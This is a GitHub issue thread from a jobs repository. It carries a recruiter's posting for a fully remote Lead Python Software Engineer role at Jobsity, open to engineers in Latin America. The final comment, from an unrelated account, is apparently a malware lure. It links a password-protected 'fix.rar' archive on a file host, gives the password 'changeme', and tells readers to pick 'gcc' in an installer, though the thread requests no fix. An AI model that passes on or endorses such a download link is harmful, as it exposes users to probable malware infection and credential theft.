### ISSUE TITLE
[FULLY REMOTE] Lead Python Software Engineer at Jobsity

### ISSUE THREAD

**Issue by AngelaBarboza** [backend-br/vagas#11630]
## About [Jobsity](https://www.jobsity.com/)💡
We’ve been around for about 10 years. We are a NY based staffing company that works with lots of different clients in the US, Canada and Europe.
Most of our developers, data engineers, and Quality Assurance engineers are located in Latin America, although we have a presence in more than 15 countries.
We have connected more than 400 people with international employment. We focus more on quality and long-term partnerships, between Jobsity, our candidates (you), and our clients. In fact, we only work with the top 3% of talents in LATAM.
As a member of the Jobsity Recruitment team, we are going to work to find you the right position depending on what is important to you.

## Requirements✔

☄️ Conversational English level. 
☄️ Must reside in the LATAM area🌎
🌠 Required Knowledge: Event-driven systems and microservices architecture.
🌠 Mastery in Python (FastAPI preferred).
🌠 Proficiency with Docker.
🌠 Over 10 years of experience with a proven track record in developing scalable, reliable systems, and a strong ability to tackle complex engineering challenges.
🌠 Experience in startups and entrepreneurship.
🌠 Must have a strong grasp of Agile methodologies, test-driven development, and continuous integration and deployment processes.
🌠 Exceptional ability to analyze complex systems, identify problems, articulate the problem, and develop effective solutions.
🌠 Comfortable taking the initiative, making decisions under uncertainty, and moving projects forward even in the face of ambiguity.
🌠 Excellent communication skills, capable of explaining complex technical concepts to non-technical stakeholders.

## Modality
👨‍💻 Fully remote
PS: position available only for engineers located in LATAM 🗺

## Perks that Jobsity offers!💎

🔹Yearly paid vacation.
🔹Paid local holidays.
🔹Learning budget.
🔹Financing program for equipment and home office supplies.
🔹Bonuses for referrals and more!

## Type of contract📜

This is a full-time position as contractor🕘
....with USD payment 💰
....long-term relationship 🤝
...within an international team 👩‍💻 👨‍💻
...and working on international client projects! 🌎

## How to apply🤔

- Send an email to [angela.barboza@jobsity.com](mailto:angela.barboza@jobsity.com) with your CV/LinkedIn attached - Send in the subject: Lead Python Software Engineer - GitHub📧

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
